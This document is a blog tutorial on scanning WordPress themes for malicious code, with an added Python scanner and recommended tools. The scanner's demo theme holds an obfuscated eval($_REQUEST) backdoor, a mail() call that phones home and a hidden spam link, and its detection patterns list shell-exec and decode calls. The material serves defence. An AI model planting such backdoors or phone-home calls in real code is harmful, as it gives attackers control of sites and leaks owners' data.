Scan and Clean WordPress Theme for Malicious Codes


If your WordPress blog isn't secured or has a loophole, it can be hacked easily. To avoid this, always follow our WordPress security tips and hacks to make your WordPress blog bulletproof. If you own websites that don't run on WordPress, you can follow our guide on online tools to check for viruses and malware on non-WordPress websites. The BulletProof Security WordPress plugin can help you scan your WordPress site for exploits, malware and loopholes such as XSS, Base64 and SQL injection hacks. These are must-have WordPress plugins for securing your blog.

Self-hosted WordPress is open source software, so there can be plenty of loopholes, but the WordPress security team fixes those issues at regular intervals. If you analyze the major reason behind all the "my blog is hacked, help me please" requests, it is mainly that people don't use legitimate software and tools on their WordPress site. If you download WordPress themes illegally and use them, there is a good chance that a theme uploaded by a random stranger on the internet has malicious code or malware inside its core theme files.

How to clean a nulled WP theme

I am not encouraging you to use premium themes illegally. (Read the last paragraph about pirating WP themes.) But if you do want to use one, make sure the nulled theme is clean, with no malicious code or malware inside the core theme files. How do you check or scan for malicious code inside WP theme files?

What kind of malicious code ends up inside WP theme files? The person uploading the theme can insert adult keywords linking back to his website, or add code that exploits your site later, after you have uploaded the theme, and so on.

They can inject code that is difficult to find. It doesn't look like regular code: it may be encoded or obfuscated, and a PHP snippet in one file may only call a class or function by name while the real payload sits in another theme file. So here we will learn where malicious code usually hides, which tools check for it after installation, and how to clean a theme before you install it.

My method:

I usually test any WP theme on my localhost first. Download the theme to your desktop and unzip it. Use wingrep or fgrep (depending on whether you are on a Windows or Linux box) to search every theme file for the strings "mail(" and "eval(". Check each call you find, and remove it if it has no legitimate purpose.

I would also suggest manually opening every file in the theme and scanning it line by line for code that calls any function or class outside WordPress. If you find encoded code, you can use this online tool to decode PHP; such code is usually base64-encoded or compressed rather than truly encrypted.

The manual method is always the best one. Now install the theme on your localhost and check the files once again. Make sure everything works properly and all the theme's functions work perfectly.
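The grep step above is easy to automate and to push a little further. Here is an added example, written for this post and not taken from it or from any of the plugins it mentions: a small Python scanner that walks an unzipped theme directory, flags the calls nulled themes typically hide behind (eval, mail, base64_decode, gzinflate, str_rot13, shell execution) and links hidden with CSS, tries to decode long base64 strings through the base64 and raw-DEFLATE layers that PHP's gzinflate(base64_decode(...)) would use, and reports file, line number and a snippet. The three theme files it scans are constructed inline for the demo; the file contents, the example.invalid addresses and the backdoor payload are all made up, so nothing is fetched from the network and the script runs offline. Point scan_theme() at a real theme directory to use it on a download.

```python
"""Theme scanner (added example, not code from the original post): flags the
calls nulled themes hide behind and decodes base64/gzinflate payloads."""
import base64
import os
import re
import tempfile
import zlib

# (label, regex) pairs: calls a legitimate theme rarely needs, plus CSS-hidden links.
SUSPICIOUS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("mail", re.compile(r"\bmail\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("gzinflate/gzuncompress", re.compile(r"\bgz(?:inflate|uncompress)\s*\(")),
    ("str_rot13", re.compile(r"\bstr_rot13\s*\(")),
    ("shell exec", re.compile(r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(")),
    ("css-hidden link", re.compile(
        r"<(?:div|span|a)\b[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden"
        r"|(?:left|top)\s*:\s*-\d{3,}px)[^>]*>", re.I)),
]
# A long quoted run of base64 characters is worth decoding even without a decode call.
BASE64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

def unwrap_payload(blob, depth=3):
    """Peel up to `depth` base64 (+ optional raw-DEFLATE) layers and return the
    decoded text, or None if it never turns into readable text."""
    data = blob.encode()
    for _ in range(depth):
        try:
            data = base64.b64decode(data, validate=True)
        except ValueError:      # not base64 (binascii.Error is a ValueError)
            return None
        try:                    # PHP gzinflate() is raw DEFLATE, hence wbits=-15
            data = zlib.decompress(data, -15)
        except zlib.error:
            pass
        try:
            text = data.decode("utf-8")
        except UnicodeDecodeError:
            continue            # perhaps another base64 layer; try once more
        if all(ch.isprintable() or ch in "\n\r\t" for ch in text):
            return text
    return None

def scan_file(path):
    """Return (path, line_no, label, snippet) for every hit in one file."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            for label, pattern in SUSPICIOUS:
                if pattern.search(line):
                    hits.append((path, line_no, label, line.strip()[:80]))
            for blob in BASE64_BLOB.findall(line):
                decoded = unwrap_payload(blob)
                if decoded is not None:
                    hits.append((path, line_no, "decoded payload", decoded.strip()[:80]))
    return hits

def scan_theme(root):
    """Scan every theme file under `root`; paths are reported relative to root."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if name.lower().endswith((".php", ".js", ".css", ".html")):
                for p, n, label, snippet in scan_file(os.path.join(dirpath, name)):
                    hits.append((os.path.relpath(p, root), n, label, snippet))
    return hits

def _php_gzdeflate(data):
    # Raw DEFLATE without a zlib header, i.e. what PHP's gzdeflate() emits.
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()

# Constructed backdoor text for the demo only; the obfuscated footer line hides it.
DEMO_PAYLOAD = b'if (isset($_REQUEST["cmd"])) { eval(stripslashes($_REQUEST["cmd"])); }'

def build_demo_theme():
    """Write a constructed three-file theme (not a real one) to a temp dir."""
    root = tempfile.mkdtemp(prefix="demo-theme-")
    blob = base64.b64encode(_php_gzdeflate(DEMO_PAYLOAD)).decode()
    files = {
        "index.php": ["<?php get_header(); the_content(); get_footer(); ?>"],
        "functions.php": ['<?php @mail("owner@example.invalid", "new install", '
                          'get_site_url()); // constructed demo: phones home'],
        "footer.php": [
            '<div style="display:none"><a href="http://example.invalid/buy">cheap pills</a></div>',
            '<?php $s = "' + blob + '";',
            "eval(gzinflate(base64_decode($s))); ?>",
        ],
    }
    for name, lines in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write("\n".join(lines) + "\n")
    return root

if __name__ == "__main__":
    for rel, line_no, label, snippet in scan_theme(build_demo_theme()):
        print(f"{rel}:{line_no} [{label}] {snippet}")
```

Run it and the footer's "$s = ..." line is reported twice: once as a decoded payload, showing the eval($_REQUEST[...]) backdoor in clear text, and again on the next line for the eval/gzinflate/base64_decode calls themselves. A hit is not proof of infection (some contact-form templates really do call mail()), so treat the report as the list of lines to read by hand, which is the manual check described above.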

WordPress Security Scanner

Sucuri's free online security tool scans your WordPress website for malware issues, malicious JavaScript, injected malicious iframes, suspicious redirections and spam, and checks whether your website is blacklisted. Just enter your website URL and it will display all the information.

[Screenshot: Sucuri scanner results]

Scan WordPress for Malware

If you're worried about malicious scripting on your websites, the Unmask Parasites online tool reveals exploited security vulnerabilities and hidden illicit content. Similar to the Sucuri tool, you enter your website address and it shows the external references, such as JavaScript and iframe code, and whether they are safe or not.

[Screenshot: Unmask Parasites results]

You can perform an additional test to reveal hidden spam links inside your website. As I said before, random strangers who upload WP themes on the internet might hide links to their own websites under adult or drug keywords.

[Screenshot: keyword injection check]

With the help of this tool, you can find out whether your website has been stuffed with these keywords.

Plugins to Check WordPress Infected with Malware

Here is a list of WordPress plugins that can help you clean a nulled WP theme or any hacked theme.

Exploit Scanner

This plugin doesn't prevent hackers from entering your website, but it can find the scripts and modified content that hackers leave behind. One common trick is hiding code or spam links with CSS (hidden text), and this plugin can find that kind of thing.

Some hackers go a step further and plant text or code in your database. Spam links are sometimes added to blog posts and comments, hidden with CSS so visitors don't see them but search engines do. This plugin searches for changed content in both WP files and database records.


WordPress Antivirus

The WP Antivirus plugin scans for malicious injections in your theme files, not just once but automatically every day. You might have a perfect theme with no malicious code, yet hackers can still inject code through a loophole in your plugins directory. So this plugin scans all WP theme files and database tables daily.

Theme Authenticity Checker (TAC)


This is exactly what we need. TAC stands for Theme Authenticity Checker. It searches the source files of every installed theme for signs of malicious code. If such code is found, it displays the path to the theme file, the line number and a small snippet of the suspect code.

So I hope all these links help you enjoy malware-free WP themes.

Note: if you're using a free WP theme, don't be complacent. These days, hackers and strangers on the internet insert malicious code into free WP themes and upload them to the web. So what I suggest is: if you're downloading a free WP theme, download it from the official WP theme repository. If you're planning to get a premium WP theme, buy it legally from sites like ThemeForest, Elegant Themes, WooThemes etc. They're the best in the market. Don't PIRATE!

It takes just 10 seconds to pirate a WP theme, but do you know how many hours it takes to design a theme, code it, debug it and release its first version? So, don't PIRATE!



  1. A very nice tutorial. But it takes hours and even days of coding and testing a theme for the developer, so he definitely deserves the price!
    I am confessing here that I used 1 or 2 nulled themes in the past when I was new to the blogosphere. But now I pay for the themes.

  2. Sunitha says:

    Oops! Why didn't I find this post before? I think I'm not lucky, as I lost my big blog with 500+ posts and 2 million page views per month due to a malware infection. One day I found my blog was infected with malware and I was not able to access the blog at all. The infection was everywhere, in every file of the blog. Later I had to delete all the files and do a fresh installation. I lost all my posts due to having no backup.

  3. Mihir says:

    A really useful tutorial for a new blogger like me. I was a little confused about using a nulled theme, but now I am afraid of doing so. Thanks for the instructions about checking the themes and website.

  4. Very helpful post !

  5. very helpful, thank you :D

  6. everest9 says:

    Good post, but I downloaded the plugin and scanned my WP database and the plugin does not remove any suspicious code. Do you know any plugin that can automatically remove it?
